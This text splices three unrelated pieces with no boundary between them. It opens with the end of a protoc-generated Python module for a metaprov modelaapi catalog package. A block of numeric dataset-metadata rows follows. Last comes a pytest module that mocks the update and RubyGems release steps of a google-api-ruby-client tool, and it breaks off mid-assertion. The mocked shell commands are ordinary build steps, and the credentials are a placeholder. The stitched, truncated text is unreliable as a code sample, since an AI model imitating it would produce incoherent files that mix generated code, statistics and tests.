# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudList)
})
_sym_db.RegisterMessage(CloudList)
CloudSpec = _reflection.GeneratedProtocolMessageType('CloudSpec', (_message.Message,), {
'DESCRIPTOR' : _CLOUDSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec)
})
_sym_db.RegisterMessage(CloudSpec)
CloudStatus = _reflection.GeneratedProtocolMessageType('CloudStatus', (_message.Message,), {
'DESCRIPTOR' : _CLOUDSTATUS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudStatus)
})
_sym_db.RegisterMessage(CloudStatus)
CompilerSpec = _reflection.GeneratedProtocolMessageType('CompilerSpec', (_message.Message,), {
'DESCRIPTOR' : _COMPILERSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CompilerSpec)
})
_sym_db.RegisterMessage(CompilerSpec)
ConfusionMatrix = _reflection.GeneratedProtocolMessageType('ConfusionMatrix', (_message.Message,), {
'DESCRIPTOR' : _CONFUSIONMATRIX,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrix)
})
_sym_db.RegisterMessage(ConfusionMatrix)
ConfusionMatrixRow = _reflection.GeneratedProtocolMessageType('ConfusionMatrixRow', (_message.Message,), {
'DESCRIPTOR' : _CONFUSIONMATRIXROW,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow)
})
_sym_db.RegisterMessage(ConfusionMatrixRow)
CurvePoint = _reflection.GeneratedProtocolMessageType('CurvePoint', (_message.Message,), {
'DESCRIPTOR' : _CURVEPOINT,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint)
})
_sym_db.RegisterMessage(CurvePoint)
DataCenter = _reflection.GeneratedProtocolMessageType('DataCenter', (_message.Message,), {
'DESCRIPTOR' : _DATACENTER,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.DataCenter)
})
_sym_db.RegisterMessage(DataCenter)
FloatParameter = _reflection.GeneratedProtocolMessageType('FloatParameter', (_message.Message,), {
'DESCRIPTOR' : _FLOATPARAMETER,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter)
})
_sym_db.RegisterMessage(FloatParameter)
GithubEvents = _reflection.GeneratedProtocolMessageType('GithubEvents', (_message.Message,), {
'DESCRIPTOR' : _GITHUBEVENTS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents)
})
_sym_db.RegisterMessage(GithubEvents)
GpuClass = _reflection.GeneratedProtocolMessageType('GpuClass', (_message.Message,), {
'DESCRIPTOR' : _GPUCLASS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass)
})
_sym_db.RegisterMessage(GpuClass)
GpuClassCost = _reflection.GeneratedProtocolMessageType('GpuClassCost', (_message.Message,), {
'DESCRIPTOR' : _GPUCLASSCOST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost)
})
_sym_db.RegisterMessage(GpuClassCost)
IntParameter = _reflection.GeneratedProtocolMessageType('IntParameter', (_message.Message,), {
'DESCRIPTOR' : _INTPARAMETER,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter)
})
_sym_db.RegisterMessage(IntParameter)
Lib = _reflection.GeneratedProtocolMessageType('Lib', (_message.Message,), {
'DESCRIPTOR' : _LIB,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Lib)
})
_sym_db.RegisterMessage(Lib)
Logs = _reflection.GeneratedProtocolMessageType('Logs', (_message.Message,), {
'DESCRIPTOR' : _LOGS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Logs)
})
_sym_db.RegisterMessage(Logs)
MLFramework = _reflection.GeneratedProtocolMessageType('MLFramework', (_message.Message,), {
'DESCRIPTOR' : _MLFRAMEWORK,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFramework)
})
_sym_db.RegisterMessage(MLFramework)
MLFrameworkList = _reflection.GeneratedProtocolMessageType('MLFrameworkList', (_message.Message,), {
'DESCRIPTOR' : _MLFRAMEWORKLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkList)
})
_sym_db.RegisterMessage(MLFrameworkList)
MLFrameworkSpec = _reflection.GeneratedProtocolMessageType('MLFrameworkSpec', (_message.Message,), {
'DESCRIPTOR' : _MLFRAMEWORKSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec)
})
_sym_db.RegisterMessage(MLFrameworkSpec)
MachineClass = _reflection.GeneratedProtocolMessageType('MachineClass', (_message.Message,), {
'DESCRIPTOR' : _MACHINECLASS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass)
})
_sym_db.RegisterMessage(MachineClass)
MachineClassCost = _reflection.GeneratedProtocolMessageType('MachineClassCost', (_message.Message,), {
'DESCRIPTOR' : _MACHINECLASSCOST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost)
})
_sym_db.RegisterMessage(MachineClassCost)
Measurement = _reflection.GeneratedProtocolMessageType('Measurement', (_message.Message,), {
'DESCRIPTOR' : _MEASUREMENT,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement)
})
_sym_db.RegisterMessage(Measurement)
ModelDeploymentSpec = _reflection.GeneratedProtocolMessageType('ModelDeploymentSpec', (_message.Message,), {
'DESCRIPTOR' : _MODELDEPLOYMENTSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec)
})
_sym_db.RegisterMessage(ModelDeploymentSpec)
ModelDeploymentStatus = _reflection.GeneratedProtocolMessageType('ModelDeploymentStatus', (_message.Message,), {
'DESCRIPTOR' : _MODELDEPLOYMENTSTATUS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus)
})
_sym_db.RegisterMessage(ModelDeploymentStatus)
NotificationSpec = _reflection.GeneratedProtocolMessageType('NotificationSpec', (_message.Message,), {
'SelectorEntry' : _reflection.GeneratedProtocolMessageType('SelectorEntry', (_message.Message,), {
'DESCRIPTOR' : _NOTIFICATIONSPEC_SELECTORENTRY,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.SelectorEntry)
})
,
'DESCRIPTOR' : _NOTIFICATIONSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec)
})
_sym_db.RegisterMessage(NotificationSpec)
_sym_db.RegisterMessage(NotificationSpec.SelectorEntry)
PRCurve = _reflection.GeneratedProtocolMessageType('PRCurve', (_message.Message,), {
'DESCRIPTOR' : _PRCURVE,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PRCurve)
})
_sym_db.RegisterMessage(PRCurve)
PretrainedModel = _reflection.GeneratedProtocolMessageType('PretrainedModel', (_message.Message,), {
'DESCRIPTOR' : _PRETRAINEDMODEL,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModel)
})
_sym_db.RegisterMessage(PretrainedModel)
PretrainedModelList = _reflection.GeneratedProtocolMessageType('PretrainedModelList', (_message.Message,), {
'DESCRIPTOR' : _PRETRAINEDMODELLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelList)
})
_sym_db.RegisterMessage(PretrainedModelList)
PretrainedModelSpec = _reflection.GeneratedProtocolMessageType('PretrainedModelSpec', (_message.Message,), {
'DESCRIPTOR' : _PRETRAINEDMODELSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelSpec)
})
_sym_db.RegisterMessage(PretrainedModelSpec)
PublicDataset = _reflection.GeneratedProtocolMessageType('PublicDataset', (_message.Message,), {
'DESCRIPTOR' : _PUBLICDATASET,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDataset)
})
_sym_db.RegisterMessage(PublicDataset)
PublicDatasetList = _reflection.GeneratedProtocolMessageType('PublicDatasetList', (_message.Message,), {
'DESCRIPTOR' : _PUBLICDATASETLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetList)
})
_sym_db.RegisterMessage(PublicDatasetList)
PublicDatasetSpec = _reflection.GeneratedProtocolMessageType('PublicDatasetSpec', (_message.Message,), {
'DESCRIPTOR' : _PUBLICDATASETSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec)
})
_sym_db.RegisterMessage(PublicDatasetSpec)
Region = _reflection.GeneratedProtocolMessageType('Region', (_message.Message,), {
'DESCRIPTOR' : _REGION,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region)
})
_sym_db.RegisterMessage(Region)
ResourceSpec = _reflection.GeneratedProtocolMessageType('ResourceSpec', (_message.Message,), {
'DESCRIPTOR' : _RESOURCESPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec)
})
_sym_db.RegisterMessage(ResourceSpec)
RocAucCurve = _reflection.GeneratedProtocolMessageType('RocAucCurve', (_message.Message,), {
'DESCRIPTOR' : _ROCAUCCURVE,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RocAucCurve)
})
_sym_db.RegisterMessage(RocAucCurve)
RunSchedule = _reflection.GeneratedProtocolMessageType('RunSchedule', (_message.Message,), {
'DESCRIPTOR' : _RUNSCHEDULE,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule)
})
_sym_db.RegisterMessage(RunSchedule)
StakeHolder = _reflection.GeneratedProtocolMessageType('StakeHolder', (_message.Message,), {
'DESCRIPTOR' : _STAKEHOLDER,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.StakeHolder)
})
_sym_db.RegisterMessage(StakeHolder)
UserRoleClass = _reflection.GeneratedProtocolMessageType('UserRoleClass', (_message.Message,), {
'DESCRIPTOR' : _USERROLECLASS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClass)
})
_sym_db.RegisterMessage(UserRoleClass)
UserRoleClassList = _reflection.GeneratedProtocolMessageType('UserRoleClassList', (_message.Message,), {
'DESCRIPTOR' : _USERROLECLASSLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassList)
})
_sym_db.RegisterMessage(UserRoleClassList)
UserRoleClassSpec = _reflection.GeneratedProtocolMessageType('UserRoleClassSpec', (_message.Message,), {
'DESCRIPTOR' : _USERROLECLASSSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassSpec)
})
_sym_db.RegisterMessage(UserRoleClassSpec)
VizUri = _reflection.GeneratedProtocolMessageType('VizUri', (_message.Message,), {
'DESCRIPTOR' : _VIZURI,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.VizUri)
})
_sym_db.RegisterMessage(VizUri)
WorkloadClass = _reflection.GeneratedProtocolMessageType('WorkloadClass', (_message.Message,), {
'DESCRIPTOR' : _WORKLOADCLASS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClass)
})
_sym_db.RegisterMessage(WorkloadClass)
WorkloadClassList = _reflection.GeneratedProtocolMessageType('WorkloadClassList', (_message.Message,), {
'DESCRIPTOR' : _WORKLOADCLASSLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassList)
})
_sym_db.RegisterMessage(WorkloadClassList)
WorkloadClassSpec = _reflection.GeneratedProtocolMessageType('WorkloadClassSpec', (_message.Message,), {
'DESCRIPTOR' : _WORKLOADCLASSSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec)
})
_sym_db.RegisterMessage(WorkloadClassSpec)
DESCRIPTOR._options = None
_NOTIFICATIONSPEC_SELECTORENTRY._options = None
# @@protoc_insertion_point(module_scope)
| 50.697604
| 12,517
| 0.770259
| 19,174
| 150,217
| 5.742672
| 0.034213
| 0.042358
| 0.065752
| 0.075615
| 0.831014
| 0.80742
| 0.801008
| 0.794251
| 0.792716
| 0.779139
| 0
| 0.037389
| 0.104589
| 150,217
| 2,962
| 12,518
| 50.71472
| 0.781237
| 0.037026
| 0
| 0.718284
| 1
| 0.001091
| 0.269378
| 0.231576
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003635
| 0
| 0.003635
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a3afd7f341b543dc17d1d864a688fe1a8b511c75
| 20,893
|
py
|
Python
|
server/tests/test_google_api_ruby_client.py
|
cclauss/discovery-artifact-manager
|
9eb6bcef290ef87006758349c725d440fbfc85d6
|
[
"Apache-2.0"
] | 38
|
2017-07-20T17:54:08.000Z
|
2022-02-20T02:16:31.000Z
|
server/tests/test_google_api_ruby_client.py
|
cclauss/discovery-artifact-manager
|
9eb6bcef290ef87006758349c725d440fbfc85d6
|
[
"Apache-2.0"
] | 183
|
2017-03-23T17:17:24.000Z
|
2022-02-09T00:07:17.000Z
|
server/tests/test_google_api_ruby_client.py
|
cclauss/discovery-artifact-manager
|
9eb6bcef290ef87006758349c725d440fbfc85d6
|
[
"Apache-2.0"
] | 42
|
2017-03-23T19:20:20.000Z
|
2022-02-20T02:17:09.000Z
|
# Copyright 2017, Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest.mock import Mock, call, mock_open, patch
import pytest
from tasks import _git, accounts, google_api_ruby_client
from tests import common
_RUBYGEMS_ACCOUNT = accounts.RubyGemsAccount('api_key')
@patch('tasks.google_api_ruby_client._commit_message.date')
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_update(clone_from_github_mock, check_output_mock, date_mock):
repo_mock = Mock()
repo_mock.diff_name_status.return_value = [
('generated/google/apis/foo_v1.rb', _git.Status.ADDED),
('generated/google/apis/bar_v1.rb', _git.Status.UPDATED),
('generated/google/apis/baz_v1.rb', _git.Status.DELETED)
]
side_effect = common.clone_from_github_mock_side_effect(repo_mock)
clone_from_github_mock.side_effect = side_effect
date_mock.today.return_value.isoformat.return_value = '2000-01-01'
manager = Mock()
manager.attach_mock(clone_from_github_mock, 'clone_from_github')
manager.attach_mock(check_output_mock, 'check_output')
manager.attach_mock(repo_mock, 'repo')
google_api_ruby_client.update('/tmp', common.GITHUB_ACCOUNT)
assert manager.mock_calls == [
call.clone_from_github('google/google-api-ruby-client',
'/tmp/google-api-ruby-client',
github_account=common.GITHUB_ACCOUNT),
call.check_output(['bundle', 'install', '--path', 'vendor/bundle'],
cwd='/tmp/google-api-ruby-client'),
call.check_output(['rm', '-rf', 'generated'],
cwd='/tmp/google-api-ruby-client'),
call.check_output(['git', 'checkout',
'generated/google/apis/discovery_v1.rb',
'generated/google/apis/discovery_v1'],
cwd='/tmp/google-api-ruby-client'),
call.check_output(['./script/generate'],
cwd='/tmp/google-api-ruby-client'),
call.repo.diff_name_status(staged=False),
call.check_output(['bundle', 'exec', 'rake', 'spec'],
cwd='/tmp/google-api-ruby-client'),
call.repo.add(['api_names_out.yaml', 'generated']),
call.repo.commit(('Autogenerated update (2000-01-01)\n'
'\nAdd:\n- foo_v1\n'
'\nDelete:\n- baz_v1\n'
'\nUpdate:\n- bar_v1'),
'Alice',
'alice@test.com'),
call.repo.push()
]
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_update_no_changes(clone_from_github_mock, check_output_mock):
repo_mock = Mock()
repo_mock.diff_name_status.return_value = []
side_effect = common.clone_from_github_mock_side_effect(repo_mock)
clone_from_github_mock.side_effect = side_effect
manager = Mock()
manager.attach_mock(clone_from_github_mock, 'clone_from_github')
manager.attach_mock(check_output_mock, 'check_output')
manager.attach_mock(repo_mock, 'repo')
google_api_ruby_client.update('/tmp', common.GITHUB_ACCOUNT)
assert manager.mock_calls == [
call.clone_from_github('google/google-api-ruby-client',
'/tmp/google-api-ruby-client',
github_account=common.GITHUB_ACCOUNT),
call.check_output(['bundle', 'install', '--path', 'vendor/bundle'],
cwd='/tmp/google-api-ruby-client'),
call.check_output(['rm', '-rf', 'generated'],
cwd='/tmp/google-api-ruby-client'),
call.check_output(['git', 'checkout',
'generated/google/apis/discovery_v1.rb',
'generated/google/apis/discovery_v1'],
cwd='/tmp/google-api-ruby-client'),
call.check_output(['./script/generate'],
cwd='/tmp/google-api-ruby-client'),
call.repo.diff_name_status(staged=False)
]
@patch('tasks.google_api_ruby_client.os.chmod')
@patch('tasks.google_api_ruby_client.os.path.expanduser')
@patch('tasks.google_api_ruby_client.open', new_callable=mock_open)
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_minor(clone_from_github_mock,
check_output_mock,
open_mock,
expanduser_mock,
chmod_mock):
repo_mock = Mock()
repo_mock.latest_tag.return_value = '0.13.6'
repo_mock.authors_since.return_value = ['alice@test.com', 'alice@test.com']
repo_mock.diff_name_status.return_value = [
('generated/google/apis/foo_v1.rb', _git.Status.ADDED),
('generated/google/apis/bar_v1.rb', _git.Status.DELETED),
('generated/google/apis/baz_v1.rb', _git.Status.UPDATED),
]
side_effect = common.clone_from_github_mock_side_effect(repo_mock)
clone_from_github_mock.side_effect = side_effect
check_output_mock.return_value = 'google-api-client (0.13.6)'
open_version_rb_mock = mock_open(
read_data=('...\n'
'module Google\n'
' module Apis\n'
' # Client library version\n'
' VERSION = \'0.13.6\'\n'
' ...\n'))
open_changelog_md_mock = mock_open(read_data='...\n')
open_credentials_mock = mock_open()
open_mock.side_effect = [
open_version_rb_mock.return_value,
open_version_rb_mock.return_value,
open_changelog_md_mock.return_value,
open_changelog_md_mock.return_value,
open_credentials_mock.return_value
]
expanduser_mock.side_effect = lambda x: '/home/test' + x[1:]
manager = Mock()
manager.attach_mock(clone_from_github_mock, 'clone_from_github')
manager.attach_mock(check_output_mock, 'check_output')
manager.attach_mock(open_mock, 'open')
manager.attach_mock(repo_mock, 'repo')
manager.attach_mock(chmod_mock, 'chmod')
manager.attach_mock(open_version_rb_mock, 'open_version_rb')
manager.attach_mock(open_changelog_md_mock, 'open_changelog_md')
manager.attach_mock(open_credentials_mock, 'open_credentials')
google_api_ruby_client.release(
'/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT)
assert manager.mock_calls == [
call.clone_from_github('google/google-api-ruby-client',
'/tmp/google-api-ruby-client',
github_account=common.GITHUB_ACCOUNT),
call.repo.latest_tag(),
call.repo.authors_since('0.13.6'),
call.check_output(['gem', 'search', '-r', '^google-api-client$']),
call.repo.diff_name_status(rev='0.13.6'),
call.open('/tmp/google-api-ruby-client/lib/google/apis/version.rb'),
call.open_version_rb().__enter__(),
call.open_version_rb().read(),
call.open_version_rb().__exit__(None, None, None),
call.open(
'/tmp/google-api-ruby-client/lib/google/apis/version.rb', 'w'),
call.open_version_rb().__enter__(),
call.open_version_rb().write(('...\n'
'module Google\n'
' module Apis\n'
' # Client library version\n'
' VERSION = \'0.14.0\'\n'
' ...\n')),
call.open_version_rb().__exit__(None, None, None),
call.open('/tmp/google-api-ruby-client/CHANGELOG.md'),
call.open_changelog_md().__enter__(),
call.open_changelog_md().read(),
call.open_changelog_md().__exit__(None, None, None),
call.open('/tmp/google-api-ruby-client/CHANGELOG.md', 'w'),
call.open_changelog_md().__enter__(),
call.open_changelog_md().write(('# 0.14.0\n'
'* Breaking changes:\n'
' * Deleted `bar_v1`\n'
'* Backwards compatible changes:\n'
' * Added `foo_v1`\n'
' * Updated `baz_v1`\n\n'
'...\n')),
call.open_changelog_md().__exit__(None, None, None),
call.check_output(['bundle', 'install', '--path', 'vendor/bundle'],
cwd='/tmp/google-api-ruby-client'),
call.check_output(['bundle', 'exec', 'rake', 'spec'],
cwd='/tmp/google-api-ruby-client'),
call.repo.commit('0.14.0', 'Alice', 'alice@test.com'),
call.repo.tag('0.14.0'),
call.repo.push(),
call.repo.push(tags=True),
call.check_output(['./script/package'],
cwd='/tmp/google-api-ruby-client'),
call.open('/home/test/.gem/credentials', 'w'),
call.open_credentials().__enter__(),
call.open_credentials().write('---\n:rubygems_api_key: api_key\n'),
call.open_credentials().__exit__(None, None, None),
call.chmod('/home/test/.gem/credentials', 0o600),
call.check_output(['gem', 'push', 'pkg/google-api-client-0.14.0.gem'],
cwd='/tmp/google-api-ruby-client')
]
@patch('tasks.google_api_ruby_client.os.chmod')
@patch('tasks.google_api_ruby_client.os.path.expanduser')
@patch('tasks.google_api_ruby_client.open', new_callable=mock_open)
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_patch(clone_from_github_mock,
check_output_mock,
open_mock,
expanduser_mock,
chmod_mock):
repo_mock = Mock()
repo_mock.latest_tag.return_value = '0.13.6'
repo_mock.authors_since.return_value = ['alice@test.com', 'alice@test.com']
repo_mock.diff_name_status.return_value = [
('generated/google/apis/foo_v1.rb', _git.Status.ADDED),
('generated/google/apis/baz_v1.rb', _git.Status.UPDATED),
]
side_effect = common.clone_from_github_mock_side_effect(repo_mock)
clone_from_github_mock.side_effect = side_effect
check_output_mock.return_value = 'google-api-client (0.13.6)'
open_version_rb_mock = mock_open(
read_data=('...\n'
'module Google\n'
' module Apis\n'
' # Client library version\n'
' VERSION = \'0.13.6\'\n'
' ...\n'))
open_changelog_md_mock = mock_open(read_data='...\n')
open_credentials_mock = mock_open()
open_mock.side_effect = [
open_version_rb_mock.return_value,
open_version_rb_mock.return_value,
open_changelog_md_mock.return_value,
open_changelog_md_mock.return_value,
open_credentials_mock.return_value
]
expanduser_mock.side_effect = lambda x: '/home/test' + x[1:]
manager = Mock()
manager.attach_mock(clone_from_github_mock, 'clone_from_github')
manager.attach_mock(check_output_mock, 'check_output')
manager.attach_mock(open_mock, 'open')
manager.attach_mock(repo_mock, 'repo')
manager.attach_mock(chmod_mock, 'chmod')
manager.attach_mock(open_version_rb_mock, 'open_version_rb')
manager.attach_mock(open_changelog_md_mock, 'open_changelog_md')
manager.attach_mock(open_credentials_mock, 'open_credentials')
google_api_ruby_client.release(
'/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT)
assert manager.mock_calls == [
call.clone_from_github('google/google-api-ruby-client',
'/tmp/google-api-ruby-client',
github_account=common.GITHUB_ACCOUNT),
call.repo.latest_tag(),
call.repo.authors_since('0.13.6'),
call.check_output(['gem', 'search', '-r', '^google-api-client$']),
call.repo.diff_name_status(rev='0.13.6'),
call.open('/tmp/google-api-ruby-client/lib/google/apis/version.rb'),
call.open_version_rb().__enter__(),
call.open_version_rb().read(),
call.open_version_rb().__exit__(None, None, None),
call.open(
'/tmp/google-api-ruby-client/lib/google/apis/version.rb', 'w'),
call.open_version_rb().__enter__(),
call.open_version_rb().write(('...\n'
'module Google\n'
' module Apis\n'
' # Client library version\n'
' VERSION = \'0.13.7\'\n'
' ...\n')),
call.open_version_rb().__exit__(None, None, None),
call.open('/tmp/google-api-ruby-client/CHANGELOG.md'),
call.open_changelog_md().__enter__(),
call.open_changelog_md().read(),
call.open_changelog_md().__exit__(None, None, None),
call.open('/tmp/google-api-ruby-client/CHANGELOG.md', 'w'),
call.open_changelog_md().__enter__(),
